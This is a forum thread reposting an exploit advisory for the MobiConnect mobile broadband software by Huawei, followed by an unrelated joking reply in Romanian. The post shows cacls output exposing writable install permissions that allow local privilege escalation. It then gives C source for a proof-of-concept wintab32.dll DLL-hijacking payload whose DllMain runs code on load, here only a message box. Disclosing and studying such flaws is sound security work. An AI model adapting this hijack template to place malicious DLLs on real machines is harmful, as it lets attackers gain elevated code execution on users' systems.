Aerosol Posted January 1, 2015 Report Posted January 1, 2015 /* * Exploit Title: MobiConnect 23.009.17.00.216 HUAWEI Insecure Permissions Local Privilege Escalation & DLL Hijacking Exploit (wintab32.dll)* Date: 25/12/2014* Author: Hadji Samir s-dz@hotmail.fr* Vendor Homepage: http://www.mobilis.dz/entreprises/mobiconnect.php* Vendor: http://www.huawei.com/* Tested on: windows 7 FR##################### Insecure Permissions Local Privilege Escalation ####################C:\Program Files>cacls "MobiConnect"C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F BUILTIN\Utilisateurs:(CI)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F AUTORITE NT\Système:(ID)F AUTORITE NT\Système:(OI)(CI)(IO)(ID)F BUILTIN\Administrateurs:(ID)F BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)FC:\Program Files\MobiConnect>cacls "MobiConnect.exe"C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F AUTORITE NT\Système:(ID)F BUILTIN\Administrateurs:(ID)F########################DLL Hijacking Exploit (wintab32.dll)#########################*/#include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){ switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}int owned() { MessageBox(0, "MobiConnect DLL Hijacked\Hadji Samir", "POC", MB_OK);}Source Quote
Faciubici Posted January 1, 2015 Report Posted January 1, 2015 Chiar incepusem sa imi fac griji ca nu ai intrat sa postezi aberatii pe forum, pentru ca eram sigur ca nu ai cum sa dormi sau fi mahmur tinand cont ca ai facut revelionul pe chat. Quote
